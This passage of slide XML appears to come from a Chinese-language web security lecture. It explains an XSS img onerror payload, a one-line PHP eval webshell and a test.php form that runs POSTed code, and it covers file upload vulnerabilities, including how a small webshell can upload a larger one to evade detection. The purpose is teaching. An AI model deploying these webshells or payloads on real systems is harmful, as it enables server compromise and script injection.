                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F0C464-4B74-4C62-A523-8B32ECC5EBC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2899064" y="3190333"/>
              <a:ext cx="7144552" cy="5607887"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>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这里就再为大家提供一种</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标签的脚本构造方法</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ctr">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pP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=ops! </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="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="alert('XSS')"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>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标签是用来定义</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中的图像，</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src</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一般是图像的来源。而</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事件会在文档或图像加载过程中发生错误时被触发。所以上面这个攻击脚本的逻辑是，当</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加载一个错误的图像来源</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时，会触发</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="24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onerror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事件，从而执行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alert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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形: 圆角 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49E36080-6564-45C2-B1A1-99CA69B89C25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2546904" y="2964184"/>
              <a:ext cx="7848872" cy="745902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对话气泡: 圆角矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E491F606-CC06-44F7-B7D3-F693CD38AEE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2792133" y="6094513"/>
            <a:ext cx="8690260" cy="618156"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -24140"/>
              <a:gd name="adj2" fmla="val 48706"/>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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>请同学们继续实验并与大家分享经验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9850257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除此之外，通过一句话木马的小马来提交功能更强大的大马可以更容易通过应用本身的检测。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B7466DC-3F76-423F-B82E-113424A8F833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1460823" y="2310888"/>
            <a:ext cx="4775854" cy="1008112"/>
            <a:chOff x="2324919" y="2752229"/>
            <a:chExt cx="4775854" cy="1008112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="组合 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C6940C-20D3-4DB5-8A37-C627121ED848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324919" y="2752229"/>
              <a:ext cx="4638669" cy="1008112"/>
              <a:chOff x="2324919" y="2752229"/>
              <a:chExt cx="4638669" cy="1008112"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="矩形 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CC74326-F99E-481C-8211-98CB5E7E3392}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2324919" y="2752229"/>
                <a:ext cx="450148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D058FB5-1BE4-4C4E-A317-52F04D235217}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2462104" y="2896245"/>
                <a:ext cx="4501484" cy="86409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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8445913E-1A53-40D8-8186-531DFF4E0FDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2599289" y="3097460"/>
              <a:ext cx="4501484" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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&lt;?php eval($_POST[a]); ?&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE585F2-6324-4564-94B3-CD1D4021F494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7649087" y="1941555"/>
            <a:ext cx="3474470" cy="1890792"/>
            <a:chOff x="2324919" y="2752229"/>
            <a:chExt cx="3474470" cy="1890792"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="组合 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59B2DB36-72CD-4465-86FB-5A8C5D1E9122}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324919" y="2752229"/>
              <a:ext cx="3474470" cy="1890792"/>
              <a:chOff x="2324919" y="2752229"/>
              <a:chExt cx="3474470" cy="1890792"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="矩形 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5728E37B-10AB-4BBB-8CC0-036638E824B7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2324919" y="2752229"/>
                <a:ext cx="3337285" cy="174677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C8778BB-72AC-49D1-A0B5-12D003F632EE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2462104" y="2896245"/>
                <a:ext cx="3337285" cy="174677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22" name="矩形 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D14ABF-F09B-46C0-AEDC-0078CA37652B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2637868" y="3021677"/>
              <a:ext cx="2916813" cy="1477328"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>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就是一个最常见最原始的小马。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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eval() </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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函数把字符串按照 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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代码来计算</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。该字符串必须是合法的 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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代码，且必须以分号结尾。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="直接连接符 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{906667BF-5641-4476-917E-73203C214268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6573391" y="2814944"/>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EFE1265-0FE3-4213-B613-30D52354F398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6573391" y="2958960"/>
            <a:ext cx="702152" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="2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E113C81C-7041-4619-A864-2054712D56C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244304" y="3881877"/>
            <a:ext cx="7921375" cy="499624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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举例，编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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test.php</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，存储到</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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目录下，代码如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="29" name="表格 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A326E1B-00D6-49CA-A6CD-DF78B5FBB948}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2138751" y="4661487"/>
          <a:ext cx="8195852" cy="2006642"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8195852">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1987254">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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($_POST['</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 </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id="form1" name="form1" method="post" action="test.php"&gt;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type="text" id="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="21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1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1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36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222D30E-75DC-44A7-8490-4DA766F0D131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072601" y="1961328"/>
            <a:ext cx="7897769" cy="477182"/>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itchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>在输入框中输入“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1890" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1890" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="189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90" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>运行后：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D93BB8-5E4F-4A93-B5CB-E4FD00C5CC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2219093" y="656965"/>
            <a:ext cx="8203959" cy="1215041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0050A3"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6AAE570-D5AA-406E-8850-69D4565FF669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2219093" y="2680221"/>
            <a:ext cx="8203959" cy="3953745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0050A3"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216670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72791" y="1217589"/>
            <a:ext cx="10297144" cy="71200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大部分的网站和应用系统都有上传功能，如用户头像上传，图片上传，文档上传等。</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172791" y="633452"/>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文件上传漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB0E624-45B2-420D-9F1E-68C5057D3539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2110547" y="4290874"/>
            <a:ext cx="9384413" cy="2308324"/>
            <a:chOff x="2360923" y="4611485"/>
            <a:chExt cx="9384413" cy="2308324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="组合 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E3AF54A-5DE7-4013-A16C-C362EE15B6A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2360923" y="4611485"/>
              <a:ext cx="9384413" cy="2308324"/>
              <a:chOff x="4933525" y="2131104"/>
              <a:chExt cx="9384413" cy="2308324"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="六边形 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D3E3FF0-446F-4951-8FF8-4F6069CD5D02}"/>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5" name="文本框 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0DD5DCC-4113-4A52-8BCE-C10713FDA097}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6935633" y="2131104"/>
                <a:ext cx="73823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当系统存在文件上传漏洞时攻击者可以将病毒，木马，</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WebShell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，其他恶意脚本或者是包含了脚本的图片上传到服务器，这些文件将对攻击者后续攻击提供便利。根据具体漏洞的差异，此处上传的脚本可以是正常后缀的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以及</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JSP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脚本，也可以是篡改后缀后的这几类脚本。</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="16" name="直接连接符 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08F568E1-C033-4281-9595-DBB80C9FE131}"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53C58D8B-6E9B-436B-99E8-DD7B003CE6D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ADC3C7D-62EC-4A34-BAC2-FC3079CA6BD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2110547" y="2129049"/>
            <a:ext cx="9073008" cy="1938992"/>
            <a:chOff x="2360923" y="2449660"/>
            <a:chExt cx="9073008" cy="1938992"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="组合 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FF61773-890E-4F02-8444-4951548776D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2360923" y="2449660"/>
              <a:ext cx="9073008" cy="1938992"/>
              <a:chOff x="4933525" y="2102592"/>
              <a:chExt cx="9073008" cy="1938992"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="六边形 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37BBE9B3-C065-42AE-8B27-A0C566CA0DA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694F9DF9-8E30-48E5-9FD4-63A66508B2F5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6984268" y="2102592"/>
                <a:ext cx="70222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一些文件上传功能实现代码</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没有严格限制用户上传的文件后缀以及文件类型</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，导致</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允许攻击者向某个可通过</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访问的目录上传任意</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文件</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，并能够将这些文件传递给</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解释器，就可以在远程服务器上执行任意</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脚本。</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="12" name="直接连接符 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EE5C163-DF6A-4DD9-93AA-5327245FECE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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A2842F4-76B0-45E9-870E-1694150CCB65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128532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B7466DC-3F76-423F-B82E-113424A8F833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="884238" y="810434"/>
            <a:ext cx="8208913" cy="864096"/>
            <a:chOff x="2324918" y="2752229"/>
            <a:chExt cx="8208913" cy="864096"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="组合 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C6940C-20D3-4DB5-8A37-C627121ED848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324918" y="2752229"/>
              <a:ext cx="8208913" cy="864096"/>
              <a:chOff x="2324918" y="2752229"/>
              <a:chExt cx="8208913" cy="864096"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="矩形 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CC74326-F99E-481C-8211-98CB5E7E3392}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2324918" y="2752229"/>
                <a:ext cx="8208913"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D058FB5-1BE4-4C4E-A317-52F04D235217}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5771762" y="2791207"/>
                <a:ext cx="4690058"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8445913E-1A53-40D8-8186-531DFF4E0FDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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病毒或者木马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37" name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E60BBBE-4431-428A-A374-BECB80D0F1F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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主要用于诱骗用户或者管理员下载执行或者直接自动运行；</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38" name="组合 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E176CD6C-AFBA-4743-BF56-53C7E1DD93BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3621137" y="1768499"/>
            <a:ext cx="8208913" cy="864096"/>
            <a:chOff x="2324918" y="2752229"/>
            <a:chExt cx="8208913" cy="864096"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="组合 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD6A050B-E818-4808-9C21-76FCC6EEF6AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2324918" y="2752229"/>
              <a:ext cx="8208913" cy="864096"/>
              <a:chOff x="2324918" y="2752229"/>
              <a:chExt cx="8208913" cy="864096"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="矩形 41">
